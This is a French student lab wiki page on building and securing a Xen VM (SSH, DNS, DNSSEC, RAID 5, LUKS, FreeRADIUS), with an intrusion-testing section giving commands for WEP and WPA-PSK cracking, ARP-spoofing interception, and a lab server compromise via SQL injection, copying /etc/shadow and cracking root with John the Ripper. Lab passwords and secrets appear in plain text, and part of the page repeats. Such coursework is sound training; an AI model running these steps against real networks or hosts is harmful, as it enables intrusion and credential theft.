$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 22094 belle-rose.site. JLB0MJqr8rfBq2MiVrZaRyDo/7/7V1GUGwCi108w8CgeUrIdImgXERY4 2nXQ21aym3Po0i+zs5DmEonEkTGMi63kjUG8ZeFjMCFm7KtNhRK8FkQk Be2yzv3odAhh/gmMyRsMa7yoLwaDWZVd4NkCJ6EaqNXP7yspcHD6pmHt 4RKJgCUo6zpLAJnFiU1cwIR+lS/HeFEW2OzOtvi/LH8bL1zewioEpTgi qHLplK68KR/1cX/4Dq2C3CaeChteMx//EkW9Vmwjg9BhRjE/VCa8P80w qJEiXeg8KXYLkCEiBK5ifgKy5EMxDG5q18ieRXaUc0F6FpG0A4POpTVx pscHmA==<br />
belle-rose.site has DNSKEY record 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
belle-rose.site has DNSKEY record 256 3 5 AwEAAdZrHCSjl8nMZ0pwfODUtCs4nD6iStiZzuBAfWTsm75qpG6JJzpr e3Oqqyr/Dm1bwXbLQUd0GNgGAidiAQtkbZIb/5ZQxuVxft2kp0GKUr34 44Bw1Gh8af1Npk9cqK368U6oD+EIrV2AnA2KC/KXm+DziNOkmifaFVvO rh6p91Ut<br />
belle-rose.site has RRSIG record NSEC 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. RXnysXybktajyP82ERJn1m9z/5dkOQABIzfUPf2/08jFQq96AMmEggH2 sAy/3wv6SKiwAvBN3dFkYtIefMAK0MdLykIwwLrGQwK1BSv5KKLCowtO Bdks2pjgBPFE4J/MnBnBXSm0HunudjziNgz+PN3bY/IieyPzIBfpHM0y UfM=<br />
belle-rose.site has NSEC record ns1.belle-rose.site. NS SOA RRSIG NSEC DNSKEY<br />
belle-rose.site has RRSIG record NS 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. GZRzkPkOu/RKjCE2+NWhHfTcicDCoaBq/QjimrrVPsMcse0pPebFZkTr lRHMLHZEglzopIigLwj3DQ7yjuB6EiAhudUWwZri82LjkVs+z5ItMPo6 kudNvs5oUqVGX7E6toy5rU11yBgPDNijuCI1aahUJpwAEOl9sGi9uJ9I NaI=<br />
belle-rose.site has RRSIG record SOA 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. rDQsyAPj2RG4epQ7AFGrpU4JzyAi1kif3X4N8L+53IrlNWMcByyCVtAA 1XRQ8+Ag7f8/Z7nMhLbRuPtEH6efhZJfhEOuuU0SK7Nernm6WgkCS4UI e4VVtXtbHLeM+CncfUywqpKRhyZB9qEpzloNdI6zyOlzS9bH9qMwZFSS TWY=<br />
belle-rose.site has SOA record ns1.belle-rose.site. postmaster.belle-rose.site. 6 604800 86400 2419200 604800<br />
<br />
= Tests d'intrusion =<br />
<br />
== Exploitation de failles du système ==<br />
<br />
Après plusieurs recherches, nous avons trouvé un petit soft permettant d'audit notre système et y afficher les possibles failles. > https://github.com/mzet-/linux-exploit-suggester<br />
<br />
En suivant la documentation :<br />
<br />
$ wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh<br />
$ chmod +x les.sh && ./les.sh<br />
<br />
On obtient les failles suivantes (audit réalisé sur notre VM) :<br />
<br />
[+] [CVE-2021-27365] linux-iscsi<br />
...<br />
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write<br />
...<br />
[+] [CVE-2019-13272] PTRACE_TRACEME<br />
...<br />
<br />
== Cassage de clef WEP d’un point d’accès WiFi ==<br />
<br />
On commence par rechercher le nom de notre interface. On utilise alors la commande (en root) :<br />
<br />
$ airmon-ng<br />
<br />
On trouve l'interface suivante :<br />
<br />
wlx40a5ef0127d0<br />
<br />
On essaie de démarrer l'interface sur le channel 3 :<br />
<br />
$ airmon-ng start wlx40a5ef0127d0 3<br />
<br />
Or on remarque que la réponse de la commande nous indique que l'interface a été renommé automatiquement "wlan0mon". On ré-utilise la commande précédente avec le nouveau nom d'interface :<br />
<br />
$ airmon-ng start wlan0mon 3<br />
<br />
On écoute ensuite tous les paquets dans l'air :<br />
<br />
$ airodump-ng wlan0mon<br />
<br />
A partir de là, on peut choisir un point d'accès à cracker en utilisant son BSSID (obtenu par la commande précédente). On choisit cracotte06.<br />
<br />
$ aireplay-ng -9 -e cracotte06 -a 04:DA:D2:9C:50:55 wlan0mon<br />
<br />
On peut récupérer les VI générés par le point d'accès en les stockant dans les fichiers output. On donne le channel 4 puisque le point d'accès est sur ce channel :<br />
<br />
$ airodump-ng -c 4 --bssid 04:DA:d2:9C:50:55 -w output wlan0mon<br />
<br />
On effectue de fausses authentifications avec la commande aireplay-ng dans un nouveau terminal :<br />
<br />
$ aireplay-ng -1 0 -e cracotte06 -a 04:DA:D2:9C:50:55 -h 40:A5:EF:01:0E:5F wlan0mon<br />
<br />
L'adresse MAC source donnée après le -h est obtenue lorsque l'on récupère les VI.<br />
<br />
Il faut maintenant laisser tourner la commande de récupération des VI assez longtemps pour obtenir assez de données (pour nous içi il a fallu attendre 40000 datas). On peut ensuite décrypter la clef WEP :<br />
<br />
$ aircrack-ng -b 04:DA:D2:9C:50:55 output*.cap<br />
<br />
On obtient alors :<br />
<br />
KEY FOUND ! [ 55:55:55:55:5A:BC:07:CB:A4:44:44:44:44 ]<br />
Decrypted correctly: 100%<br />
<br />
== Cassage de mot de passe WPA-PSK par force brute ==<br />
<br />
$ airmon-ng<br />
$ airmon-ng start wlan0mon 9<br />
$ airodump-ng wlan0mon<br />
<br />
On choisit le point d'accès kracotte06 à cracker. On récupère son BSSID avec la commande précédente et on utilise :<br />
<br />
$ airodump-ng -c 4 --bssid 44:AD:D9:5F:87:05 -w psk wlan0mon<br />
<br />
On crée le dictionnaire contenant toutes les clefs à tester avec la commande <code>crunch</code><br />
<br />
$ crunch 8 8 0123456789 -o dictionnaire.lst<br />
<br />
Pour savoir si un Handshake a été trouvé, on utilise la commande :<br />
<br />
$ aircrack-ng psk*.cap<br />
<br />
On trouve : <br />
<br />
# BSSID ESSID Encryption<br />
1 44:AD:D9:5F:87:05 kracotte06 WPA (1 handshake)<br />
<br />
On peut alors lancer la commande de test des clefs :<br />
<br />
$ aircrack-ng -w dictionnaire.lst -b 44:AD:D9:5F:87:05 psk*.cap<br />
<br />
Après un peu d'attente, on obtient la clef suivante :<br />
<br />
KEY FOUND! [ 59906999 ]<br />
<br />
== Attaque de type "homme au milieu" par usurpation ARP ==<br />
<br />
On branche un PC bleu sur une zabeth en ethernet et on lui configure une IP. Ensuite on peut installer dsniff et wireshark.<br />
<br />
On fait :<br />
<br />
$ echo 1 > /proc/sys/net/ipv4/ip_forward<br />
<br />
Puis on se fait passer pour le routeur (172.26.145.254) auprès de la zabeth (172.26.145.61):<br />
<br />
$ arpspoof -t 172.26.145.61 172.26.145.254<br />
<br />
En lançant wireshark, on peut voir les informations envoyées par la zabeth passer en clair.<br />
<br />
== Intrusion sur un serveur d’application Web ==<br />
<br />
Sur honey.plil.info : <br />
<br />
1. injection SQL<br />
<br />
2. connexion en tant qu'admin<br />
<br />
3. telechargement du fichier "config-db.php" (On remarque que il existe une BDD phpmyadmin) et "database.php" (ce fichier semble lui ne pas nous apporter d'informations)<br />
<br />
4. honey.plil.info/phpmyadmin -> connexion avec les logins trouvés dans le fichier "config-db.php" (phpmyadmin et gencovid19). On trouve alors une table "pma_users" indiquant le nom de plusieurs utilisateurs (totor62, manuals, phpmyadmin et root).<br />
<br />
5. en essayant le mdp "gencovid19" avec ces identifiants sur phpmyadmin : on peut se connecter en tant que "root" sur la BDD et on trouve le mdp de rex dans la bdd "test" et table "users".<br />
<br />
6. connexion en ssh sur rex@honey.plil.info.<br />
<br />
7. comme indication : "le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets". Alors on va créer un fichier de mots de 4 lettre pour ensuite doubler ces mots (exemple : bobo => bobobobo) pour essayer de cracker le mot de passe par la force brute. On créée alors le dictionnaire avec l'utilitaire crunch comme pour obtenir les clefs WEP :<br />
<br />
$ crunch 4 4 abcdefghijklmnopqrstuvwxyz > dico.txt<br />
<br />
Et on double la taille des mots :<br />
<br />
$ sed -i 's/\(.*\)/\1\1/' dico.txt<br />
<br />
On copie ensuite les fichiers "/etc/passwd" et "/etc/shadow" de rex@honey.plil.info sur notre zabeth. <br />
<br />
$ scp rex@honey.plil.info:/etc/passwd .<br />
$ scp rex@honey.plil.info:/etc/shadow .<br />
<br />
On utilise alors l'utilitaire "shadow" pour obtenir un fichier contenant le mot de passe haché de root :<br />
<br />
$ unshadow passwd shadow | head -1 > honey<br />
<br />
Puis on utilise "John the Ripper" pour cracker le mot de passe :<br />
<br />
$ john -w:dico.txt honey<br />
<br />
Après quelques minutes, on peut afficher le mot de passe trouvé :<br />
<br />
$ john --show honey<br />
root:fortfort:0:0:root:/root:/bin/bash<br />
1 password hash cracked, 0 left<br />
<br />
On trouve le mot de passe de root@honey.plil.info qui est "fortfort".<br />
<br />
= Point d'accès Wi-Fi authentifié via FreeRADIUS =<br />
<br />
== Configuration du point d'accès ==<br />
<br />
=== Point d'accès ===<br />
<br />
Tout d'abord il faut configurer l'authentification EAP dans la configuration :<br />
<br />
conf t<br />
<br />
aaa new-model<br />
aaa authentication login eap_rose group radius_rose<br />
radius-server host 193.48.57.181 auth-port 1812 acct-port 1813 key zinzin<br />
aaa group server radius radius_rose<br />
server 193.48.57.181 auth-port 1812 acct-port 1813<br />
exit<br />
<br />
Configurons le SSID :<br />
<br />
conf t<br />
<br />
dot11 ssid SSID_ROSE<br />
vlan 5<br />
authentication open eap eap_rose<br />
authentication network-eap eap_rose<br />
authentication key-management wpa<br />
mbssid guest-mode<br />
exit<br />
exit<br />
<br />
On associe notre SSID à l'interface WIFI :<br />
<br />
conf t<br />
<br />
interface Dot11Radio0<br />
encryption vlan 5 mode ciphers aes-ccm tkip<br />
ssid SSID_ROSE<br />
mbssid<br />
exit<br />
exit<br />
<br />
On paramètre notre VLAN (5)<br />
<br />
conf t<br />
<br />
interface Dot11Radio0.5<br />
encapsulation dot1Q 5<br />
no ip route-cache<br />
bridge-group 5<br />
bridge-group 5 subscriber-loop-control<br />
bridge-group 5 spanning-disabled<br />
bridge-group 5 block-unknown-source<br />
exit<br />
exit<br />
<br />
On configure l'interface filaire<br />
<br />
conf t<br />
<br />
interface GigabitEthernet0.5<br />
encapsulation dot1Q 5<br />
bridge-group 5<br />
exit<br />
exit<br />
<br />
Enfin, on configure l'IP de l'AP et sa gateway<br />
<br />
conf t<br />
<br />
ip default-gateway 10.1.0.1<br />
interface BVI 1<br />
ip address 10.1.0.3 255.255.255.0<br />
exit<br />
exit<br />
<br />
=== Routeur ===<br />
<br />
Commençons par configurer le VLAN 1 <br />
<br />
conf t<br />
<br />
interface vlan 1<br />
ip address 10.1.0.1 255.255.255.0<br />
exit<br />
exit<br />
<br />
Puis on configure le port (ici Gi1/0/3<br />
<br />
conf t<br />
<br />
interface Gi1/0/3<br />
switchport<br />
switchport mode trunk<br />
switchport trunk allowed vlan add 1<br />
exit<br />
exit<br />
<br />
Et voilà mon grand<br />
<br />
== Serveur FreeRADIUS ==<br />
<br />
Installation de freeRADIUS<br />
<br />
apt install freeradius<br />
<br />
On commence par configurer <code>/etc/freeradius/3.0/clients.conf</code> à détailler<br />
<br />
client zozo {<br />
ipaddr = 10.1.0.3/24<br />
secret = zinzin<br />
}<br />
<br />
ensuite <code>/etc/freeradius/3.0/eap.conf</code><br />
<br />
eap {<br />
[...]<br />
default_eap_type = peap<br />
}<br />
<br />
puis <code>/etc/freeradius/3.0/users</code><br />
<br />
[...]<br />
root Cleartext-Password := "glopglop"<br />
<br />
Pour vérifier que tout fonctionne bien, on peut lancer freeradius en mode debug <code>freeradius -X</code> (après avoir au préalable stoppé le processus)<br />
<br />
= Réalisations =<br />
<br />
== Sécurisation des données (RAID 5) ==<br />
<br />
Nous avons besoin de 3 LV à rajouter à notre VM :<br />
<br />
$ lvcreate -L1G -n Bellerose-raid1 storage<br />
$ lvcreate -L1G -n Bellerose-raid2 storage<br />
$ lvcreate -L1G -n Bellerose-raid3 storage<br />
<br />
Nous pouvons ainsi les rajouter à la configuration de notre VM (<code>/etc/xen/Bellerose.cfg</code>):<br />
<br />
'phy:/dev/storage/Bellerose-raid1,xvda5,w'<br />
'phy:/dev/storage/Bellerose-raid2,xvda6,w'<br />
'phy:/dev/storage/Bellerose-raid3,xvda7,w'<br />
<br />
Nous pouvons ensuite créer le RAID en relançant la VM et en se connectant dessus.<br />
<br />
$ apt install mdadm<br />
<br />
On va ensuite créer un disque nommé <code>/dev/md0</code> grâce à <code>mdadm</code> :<br />
<br />
$ mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7<br />
<br />
On peut ainsi vérifier que notre RAID 5 est effectif :<br />
<br />
$ lsblk<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
xvda1 202:1 0 512M 0 disk [SWAP]<br />
xvda2 202:2 0 4G 0 disk /<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
xvda5 202:5 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda6 202:6 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
xvda7 202:7 0 1G 0 disk <br />
`-md0 9:0 0 2G 0 raid5 <br />
<br />
Enfin il faut monter ce disque fraîchement créé :<br />
<br />
$ mkfs.ext4 /dev/md0<br />
$ mkdir /media/raid<br />
<br />
on ajoute cette ligne dans <code>/etc/fstab</code> :<br />
<br />
/dev/md0 /media/raid ext4 defaults 0 1<br />
<br />
puis<br />
<br />
$ mount -a<br />
<br />
et toc<br />
<br />
== Chiffrement des données ==<br />
<br />
On branche la clé USB sur le petit PC bleu, et on lance <code>lsblk</code> et on trouve :<br />
<br />
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT<br />
sda 8:0 1 7,2G 0 disk <br />
<br />
Donc on peut formater la clef qui contient déjà quelque chose dessus :<br />
<br />
$ mkfs.ext4 /dev/sda<br />
<br />
Avec <code>cryptsetup</code> on peut initialiser la clef et lui donner un mdp :<br />
<br />
$ cryptsetup luksFormat /dev/sda<br />
<br />
On crée une partition chiffrée sur la clé :<br />
<br />
$ cryptsetup luksOpen /dev/sda data<br />
<br />
Et on formate :<br />
<br />
$ mkfs.ext4 /dev/mapper/data<br />
<br />
On monte cette partition pour lui permettre de contenir des fichiers :<br />
<br />
$ mkdir /mnt/data-usb<br />
$ mount -t ext4 /dev/mapper/data /mnt/data-usb<br />
<br />
On y ajoute donc un fichier de test :<br />
<br />
$ touch /mnt/data-usb/boujour.txt<br />
<br />
Puis on démonte et on ferme le volume chiffré<br />
<br />
$ umont /mnt/data-usb<br />
$ cryptsetup luksClose data<br />
<br />
Ensuite en branchant la clé USB sur un autre PC pour voir le fonctionnement de notre chiffrement, et lorsqu'on essaie d'accèder à la clef, celle ci nous demande un mot de passe pour accèder aux fichiers, donc le chiffrement fonctionne correctement.</div>Bjacquothttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G6&diff=57834TP sysres IMA5 2021/2022 G62022-01-11T14:36:24Z<p>Bjacquot : </p>
<hr />
<div>__TOC__<br />
<br style="clear: both;"/><br />
<br />
=Réalisations=<br />
<br />
=Création de la machine virtuelle=<br />
<br />
On veut créer notre machine virtuelle sur l'hyperviseur (HV) capbreton. Afin de pouvoir télécharger l'image Debian, on utilise tout d'abord la commande suivante :<br />
<br />
$ export http_proxy=http://proxy.plil.fr:3128<br />
<br />
Pour lancer la création de la machine virtuelle, on doit donner le nom de la machine qui sera Bellerose (d'après le thème des noms de bière). Ensuite nous avons l'adresse IP qui nous a été attribuée lors de la répartition des groupes (donc pour nous ce sera 193.48.57.181). On donne aussi l'adresse IP du routeur flottant (193.48.57.190) et le masque du réseau (255.255.255.240 car c'est un /28). On indique également l'emplacement des disques virtuels : /usr/local/xen, le mot de passe pour se connecter à la machine virtuelle : pasglop, et la distribution que nous allons utiliser qui est Debian bullseye.<br />
<br />
$ xen-create-image --hostname=Bellerose --ip=193.48.57.181 --gateway=193.48.57.190 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye<br />
<br />
On crée ensuite 2 LV de 10 Go (nommés Bellerose1 et Bellerose2) sur le groupe de volume storage.<br />
<br />
$ lvcreate -L10G -n Bellerose1 storage<br />
$ lvcreate -L10G -n Bellerose2 storage<br />
<br />
Puis il faut les formater au format ext4, alors on utilise les commandes suivantes :<br />
<br />
$ mkfs.ext4 /dev/storage/Bellerose1<br />
$ mkfs.ext4 /dev/storage/Bellerose2<br />
<br />
On modifie notre fichier /etc/xen/Bellerose.cfg pour indiquer à la machine virtuelle qu'elle possède les volumes logiques Bellerose1 et Bellerose2 (on ajoute alors 2 lignes dans la fonction disk) et on ajoute le bridge IMA5sc dans la fonction vif.<br />
<br />
$ vim /etc/xen/Bellerose.cfg<br />
disk = [<br />
'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',<br />
'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',<br />
'phy:/dev/storage/Bellerose1,xvda3,w',<br />
'phy:/dev/storage/Bellerose2,xvda4,w'<br />
]<br />
vif = [ 'ip=193.48.57.181 ,mac=00:16:3E:FA:D0:95 ,bridge=IMA5sc' ]<br />
<br />
On peut maintenant lancer notre machine virtuelle :<br />
<br />
$ xl create -c /etc/xen/Bellerose.cfg<br />
<br />
Avec la commande :<br />
<br />
$ cat /etc/fstab<br />
<br />
On voit xvda1 et xvda2. On va créer xvda3 et xvda4 pour pouvoir y mettre les répertoires var et home de notre machine virtuelle :<br />
<br />
$ mkdir /mnt/xvda3<br />
$ mkdir /mnt/xvda4<br />
$ mount /dev/xvda3 /mnt/xvda3<br />
$ mount /dev/xvda4 /mnt/xvda4<br />
<br />
Puis on déplace le répertoire var dans le disque xvda4 :<br />
<br />
$ mv /var/* /mnt/xvda4<br />
<br />
Pour monter les disques, on ajoute ces lignes dans le fichier /etc/fstab :<br />
<br />
# /home vers xvda3<br />
/dev/xvda3 /home ext4 defaults 0 2<br />
# /var vers xvda4<br />
/dev/xvda4 /var ext4 defaults 0 2<br />
<br />
On monte le tout à l'aide de la commande :<br />
<br />
mount -a<br />
<br />
Enfin avec lsblk, on peut voir les deux partitions de notre VM :<br />
<br />
$ lsblk<br />
xvda3 202:3 0 10G 0 disk /home<br />
xvda4 202:4 0 10G 0 disk /var<br />
<br />
Enfin, nous activons l'IPv6 sur l'interface en modifiant <code>/etc/network/interfaces</code><br />
<br />
iface eth0 inet6 auto<br />
<br />
Pour quitter la VM : CTRL+]<br />
<br />
= Services Internet =<br />
<br />
== Serveur SSH ==<br />
<br />
$ apt install openssh-server<br />
<br />
on édite le fichierde conf <code>/etc/ssh/sshd_config</code> (via ssh key) :<br />
<br />
PermitRootLogin without-password // je l'ai repassé en "yes" suite au mail et le mdp root est celui de pifou habituel <br />
PubkeyAuthentication yes<br />
<br />
après on reload la conf<br />
<br />
$ systemctl reload ssh<br />
<br />
On génère une clé ssh avec <code>ssh-keygen -t ed25519</code> et on l'ajoute dans <code>/.ssh/authorized_keys</code> et c'est gooooood<br />
<br />
== Serveur DNS ==<br />
<br />
on achète le ndd<br />
<br />
on crée un "Glue Record" pour notre nameserver <code>ns1.belle-rose.site</code><br />
<br />
on install bind<br />
<br />
$ apt install bind9<br />
<br />
on configure <code>/etc/resolv.conf</code><br />
<br />
nameserver 127.0.0.1<br />
<br />
on configure bind <code>/etc/bind/named.conf.local</code><br />
<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
On ajoute nos ns <code>/etc/bind/db.belle-rose.site</code><br />
<br />
;<br />
; BIND dans ta face<br />
;<br />
$TTL 604800<br />
@ IN SOA ns1.belle-rose.site. postmaster.belle-rose.site. (<br />
2 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
@ IN NS ns1.belle-rose.site.<br />
@ IN NS ns6.gandi.net.<br />
ns1 IN A 193.48.57.181<br />
<br />
Ensuite on peut tester notre conf avec<br />
<br />
$ host -t any ns1.belle-rose.site localhost<br />
Using domain server:<br />
Name: localhost<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
ns1.belle-rose.site has address 193.48.57.181<br />
<br />
Et on incrémente aussi le Serial dans <code>/etc/bind/db.belle-rose.site</code> à 3.<br />
<br />
== Certificat ==<br />
<br />
Notre certificat Gandi nous a été retiré de force par quelqu'un de mal intentionné. De ce fait, nous avons utilisé un certificat <code>Let's Encrypt</code>. Après avoir installé <code>certbot</code>, on utilise simplement la commande :<br />
<br />
certbot --apache<br />
<br />
https://www.belle-rose.site/ IZOK<br />
<br />
== DNSSEC ==<br />
<br />
On suit les étapes suivantes :<br />
<br />
1. On ajoute l’option <code>dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code><br />
<br />
2. On crée un répertoire <code>belle-rose.site.dnssec</code> pour y générer les clefs<br />
<br />
3. On crée la clef asymétrique de signature de clefs de zone :<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE belle-rose.site<br />
<br />
4. On crée la clef asymétrique de la zone pour signer les enregistrements<br />
<br />
$ dnssec-keygen -a RSASHA1 -b 1024 -n ZONE belle-rose.site <br />
<br />
5. On renomme les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);<br />
<br />
$ mv Kbelle-rose.site.+005+37138.key belle-rose.site-ksk.key<br />
$ mv Kbelle-rose.site.+005+35638.key belle-rose.site-zsk.key<br />
$ mv Kbelle-rose.site.+005+37138.private belle-rose.site-ksk.private<br />
$ mv Kbelle-rose.site.+005+35638.private belle-rose.site-zsk.private<br />
<br />
6. On inclue les clefs publiques dans votre fichier de zone <code>/etc/bind/db.belle-rose.site</code>, et on incrémente le numéro de version de la zone ;<br />
<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-ksk.key<br />
$include /etc/bind/belle-rose.site.dnssec/belle-rose.site-zsk.key<br />
<br />
7. On signe les enregistrements de la zone ;<br />
<br />
$ dnssec-signzone -o belle-rose.site -k belle-rose.site-ksk ../db.belle-rose.site belle-rose.site-zsk<br />
<br />
8. On modifie le fichier <code>named.conf.local</code> pour utiliser la zone signée de suffixe .signed :<br />
<br />
$ vim ../named.conf.local<br />
zone "belle-rose.site" IN {<br />
type master;<br />
file "/etc/bind/db.belle-rose.site.signed";<br />
allow-transfer { 217.70.177.40; };<br />
};<br />
<br />
9. il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier www.belle-rose.site-ksk.key) à notre registrar (sur gandi.net, dans la section "Manage DNSSEC" puis "DNS servers")<br />
<br />
root@Bellerose:/etc/bind/belle-rose.site.dnssec# cat belle-rose.site-ksk.key <br />
; This is a key-signing key, keyid 22094, for belle-rose.site.<br />
; Created: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Publish: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
; Activate: 20220111091701 (Tue Jan 11 09:17:01 2022)<br />
belle-rose.site. IN DNSKEY 257 3 5 AwEAAbbNBQJskwFezV1LwDsxAkCVbOcy4X3/mgffMjd/3FIHZpkdVrk3 w88041cgWbVSmom0ma8fFNqntidWlO//rMPvKT0ex3dqCse7on3/odox vxR3Zh5hPdv4K7X35BLuZta4x/RCBLgiFVyXo12qqBl0Htxn2hRyycKv 2caEYwnyRI75KSrr5f5XtQS8LyZCbtmMAp5YJu1wiDxwLcUwwJKvYS+q dtq4sm3KwW+qbjcUswkMMjXNAsvzwZ5FyHcondvvPuErc+Fhdvpxyoq+ W44ynLRnz7cb3R44z/TXFCwNlQI3MWzFvhbDK1YeJLpqjgYrET4eqqka mbFMYuLPQzE=<br />
<br />
(on copie que la partie chiffrée, pas le record DNSKEY)<br />
<br />
10. Enfin, nous pouvons tester la configuration:<br />
<br />
root@Bellerose:~# host -t any belle-rose.site<br />
belle-rose.site has RRSIG record DS 8 2 3600 20220210205226 20220111074233 56238 site. t5ANbAiG69DP5E9ccCIMtEEMs1urP6mSQpb210bDUbCD7vdXqONhLJ9M dcjyHQjhdTWKd9qc48tnY8fwL4PUeOYLexcaUEQgLMkbEBUDMzpcvMsb n4sM2BXgk7lJ9vyE1zsgfBNg7X8IV5c7sRrEuZyg7VbjPYmqx5BJ3cC8 Dy0=<br />
belle-rose.site has DS record 22094 5 2 86D5EAC51853FAA1865BB63C0F353EEB50D5A59093409E66A3F7044C AC3AF70F<br />
belle-rose.site name server ns6.gandi.net.<br />
belle-rose.site name server ns1.belle-rose.site.<br />
belle-rose.site has RRSIG record DNSKEY 5 2 604800 20220210082130 20220111082130 6672 belle-rose.site. bh2pFBuNXANoGib6RK5MAab6xy7jbUEYVOr6Pk/pa8weJPD/ACk0Z1pm urvc++ReoccxNxNy+BCd2Ri1GLhZ+kGXrF8xuNUYdyo+zpd+zZUgrx1C hKRSUqeBVpAn0uyDlRtG8cPPw01iYpDBCqmnif7+GblIH6eSJhOf+98d l8o=<br />
